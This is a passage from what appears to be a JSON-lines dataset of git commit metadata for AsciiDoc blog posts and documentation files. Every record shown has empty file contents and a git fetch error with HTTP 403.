ing-boot,mbenson\/spring-boot,herau\/spring-boot,olivergierke\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ollie314\/spring-boot,isopov\/spring-boot,donhuvy\/spring-boot,lexandro\/spring-boot,candrews\/spring-boot,RichardCSantana\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,sbuettner\/spring-boot,hello2009chen\/spring-boot,RichardCSantana\/spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,deki\/spring-boot,ameraljovic\/spring-boot,i007422\/jenkins2-course-spring-boot,joshiste\/spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joansmith\/spring-boot,qerub\/spring-boot,michael-simons\/spring-boot,minmay\/spring-boot,akmaharshi\/jenkins,afroje-reshma\/spring-boot-sample,lexandro\/spring-boot,vpavic\/spring-boot,linead\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,brettwooldridge\/spring-boot,joansmith\/spring-boot,dreis2211\/spring-boot,drumonii\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,ameraljovic\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1aa55a5ac9270c7ef837ba606a3be543873b6e3f","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a88a50a8e079dff92e0a11b3ff392b235dc98b11","subject":"Update 2016-06-28-Edutech.adoc","message":"Update 2016-06-28-Edutech.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Edutech.adoc","new_file":"_posts\/2016-06-28-Edutech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c18cb972f7c2499a2597d52b4705411b9805c6b","subject":"Update 2016-08-10-Lattice.adoc","message":"Update 2016-08-10-Lattice.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-10-Lattice.adoc","new_file":"_posts\/2016-08-10-Lattice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba3b88529d2b38f0091e909cf5b93a2c0e92da39","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca3b6084cbc0317764f9ce7496635f8a506b28f0","subject":"y2b create post Can You Solve This iPhone Puzzle?","message":"y2b create post Can You Solve This iPhone Puzzle?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-03-Can-You-Solve-This-iPhone-Puzzle.adoc","new_file":"_posts\/2016-11-03-Can-You-Solve-This-iPhone-Puzzle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e58eb21503de2c0f055998b19525fc3bef88635","subject":"Update 2017-05-06-Dependency-Injection-demistified.adoc","message":"Update 2017-05-06-Dependency-Injection-demistified.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-05-06-Dependency-Injection-demistified.adoc","new_file":"_posts\/2017-05-06-Dependency-Injection-demistified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cf15debf2f0b802a05fa5213c294c43138902e3","subject":"start of API doc","message":"start of API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"64f01ef02a77eba87ad886b51a8ed4ecc8eb68b9","subject":"y2b create post Building the Super Macbook Pro","message":"y2b create post Building the Super Macbook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-28-Building-the-Super-Macbook-Pro.adoc","new_file":"_posts\/2013-05-28-Building-the-Super-Macbook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4faab212e36b0c96523d536ea0400f245c848c4","subject":"Update 2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","message":"Update 2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","new_file":"_posts\/2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f013e6f558dec362d8b6c02a2ae0d1c2b0d1430","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a725d1f5099e3e6949d04a4ae3f8b85c9c79f1be","subject":"New Event - ClojureBridge London May 2019","message":"New Event - ClojureBridge London May 2019\n\nAdding to the Clojure.org events section the next ClojureBridge London event to\nbe held in May 2019.\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojurebridge-london-may-2019.adoc","new_file":"content\/events\/2019\/clojurebridge-london-may-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"24f8fe3b2e9b746ca7f0ce0501e32923ee9452e3","subject":"y2b create post LEVITATING SPEAKER = MIND BLOWN!","message":"y2b create post LEVITATING SPEAKER = MIND BLOWN!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-25-LEVITATING-SPEAKER--MIND-BLOWN.adoc","new_file":"_posts\/2015-10-25-LEVITATING-SPEAKER--MIND-BLOWN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94f3d6f269352415a9829ac350f31e2d7efe98c8","subject":"Update 2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","message":"Update 2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","new_file":"_posts\/2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e891608f5033bef1826d768df1b44e53ece0c489","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a26bf194aec52e883d05f14803f9045029c0667","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f944c0920f713f51c986776dd121e9255d07f13","subject":"Deleted 2015-5-10-uGui.adoc","message":"Deleted 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8421b2917adf1bd6b96bd06254c1242cf015e72d","subject":"Several additions to Developers Manual","message":"Several additions to Developers Manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8bd749303a03bde705df75102808e81454467d4","subject":"Added documentation about events, cross site scripting prevention, the new XPath extension function transform() and the new stylesheet parameter $req:request-xml-doc that is passed to every pipeline transformation step.","message":"Added documentation about events, cross site scripting prevention, the new XPath extension function transform() and the new stylesheet parameter $req:request-xml-doc that is passed to every pipeline transformation step.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbc943f7bf374f86ea5785dca98d7a3dfde39bbe","subject":"[docs] Update Impala links to the Apache docs\/wiki","message":"[docs] Update Impala links to the Apache docs\/wiki\n\nChange-Id: I77f02823f421ab801ac3b6a03cc69a4075c63c23\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9904\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af6b68d75945aa24b5ffd322a5c348c15c3e8ad1","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393d4e60993a9450ccacff2bd7ee0dab9fa7d831","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"442eb944ddfea12553b47a78c4479448c7d80fe0","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ff4816d76b72194fdb59457acc550bd570b629","subject":"Add migration guide to documentation (#8283)","message":"Add migration guide to documentation (#8283)\n\n* Migration guide 1st draft\n\n* Restructure and improve migration guide\n\n* Update migrating-to-vaadin8.asciidoc\n","repos":"Darsstar\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,Legioth\/vaadin,Legioth\/vaadin,Legioth\/vaadin,mstahv\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,Legioth\/vaadin,asashour\/framework,peterl1084\/framework,mstahv\/framework,peterl1084\/framework,asashour\/framework,Legioth\/vaadin,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/migration\/migrating-to-vaadin8.asciidoc","new_file":"documentation\/migration\/migrating-to-vaadin8.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"803189b92301ccd0857e940d87cf225a79bed3fe","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"056763cad3f9505505c3fe4a187a0ed5764e556c","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f02d4a63aca4f5a3eb125833752fde825c3b82e","subject":"Update 2018-03-01-enable-installed-test-module-in-drupal.adoc","message":"Update 2018-03-01-enable-installed-test-module-in-drupal.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2018-03-01-enable-installed-test-module-in-drupal.adoc","new_file":"_posts\/2018-03-01-enable-installed-test-module-in-drupal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8e4e70e2c93010672d38b74176a2efff2a1a002","subject":"Update 2015-04-30-My-VM-is-running-out-of-diskspace.adoc","message":"Update 2015-04-30-My-VM-is-running-out-of-diskspace.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-30-My-VM-is-running-out-of-diskspace.adoc","new_file":"_posts\/2015-04-30-My-VM-is-running-out-of-diskspace.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a0681cd24239ca2b8900aafda9185b35aa08dff","subject":"Update 2016-04-12-Erika-Forte-on-Career-Development.adoc","message":"Update 2016-04-12-Erika-Forte-on-Career-Development.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Erika-Forte-on-Career-Development.adoc","new_file":"_posts\/2016-04-12-Erika-Forte-on-Career-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b4956d8f76ec5f6a35e4a97cc7a7dae7256ed54","subject":"Update 2017-01-29-Number-letter-count-Projeto-Euler.adoc","message":"Update 2017-01-29-Number-letter-count-Projeto-Euler.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-29-Number-letter-count-Projeto-Euler.adoc","new_file":"_posts\/2017-01-29-Number-letter-count-Projeto-Euler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e383e4a93c25a7f8f26e886d7e713ce87369217","subject":"Update 2017-05-14-Die-Unfairness-der-Radikaltheorie.adoc","message":"Update 2017-05-14-Die-Unfairness-der-Radikaltheorie.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-14-Die-Unfairness-der-Radikaltheorie.adoc","new_file":"_posts\/2017-05-14-Die-Unfairness-der-Radikaltheorie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03bb0213862ee833cfee5dd4e1435229c67abf02","subject":"Example 003: adoc","message":"Example 003: adoc","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"example\/003_Notes\/doc\/003.adoc","new_file":"example\/003_Notes\/doc\/003.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25f6037477c20aded1fb975c2bcfd0a10fb36487","subject":"new blog entry discussing hAlerts and its integration with third-party systems","message":"new blog entry discussing hAlerts and its integration with third-party\nsystems\n","repos":"hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/08\/alerts-multiple-sources.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/08\/alerts-multiple-sources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad1f6ef9447bf356e824746ea95f9b3ad6bedc13","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fabb3981d98c8671f7a2a0621561dc52a668c86f","subject":"y2b create post This Slime Could Be Good For Your Phone...","message":"y2b create post This Slime Could Be Good For Your Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-01-ThisSlimeCouldBeGoodForYourPhone.adoc","new_file":"_posts\/2018-01-01-ThisSlimeCouldBeGoodForYourPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcc144c4677802c4293307454f528aaa973b8825","subject":"Update 2016-09-19-Shapeless-Computing-deltas.adoc","message":"Update 2016-09-19-Shapeless-Computing-deltas.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-09-19-Shapeless-Computing-deltas.adoc","new_file":"_posts\/2016-09-19-Shapeless-Computing-deltas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1486379fc72aa539495622f2a780b658b8c0c5b4","subject":"y2b create post Who Needs iPhone 7 AirPods?","message":"y2b create post Who Needs iPhone 7 AirPods?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-12-Who-Needs-iPhone-7-AirPods.adoc","new_file":"_posts\/2016-10-12-Who-Needs-iPhone-7-AirPods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cc712da919b7645ee4e009d9d76fc5f42352de7","subject":"Update 2015-05-25-Composer.adoc","message":"Update 2015-05-25-Composer.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-05-25-Composer.adoc","new_file":"_posts\/2015-05-25-Composer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bcbea05955fc344e001eb687e2a403a877eaf09","subject":"added buffer clearing page for blender","message":"added buffer clearing page for blender\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_buffer_clearing.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_buffer_clearing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"6d635b731b5bb259e6712eaaa0c3b3e6bfef6973","subject":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-20-UpdateErstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78973ffa0e23ef325fe72c5c052b8ef23d204957","subject":"Update 2015-08-27-B-Sdes-LV-Talk-SIE-Mle-technology.adoc","message":"Update 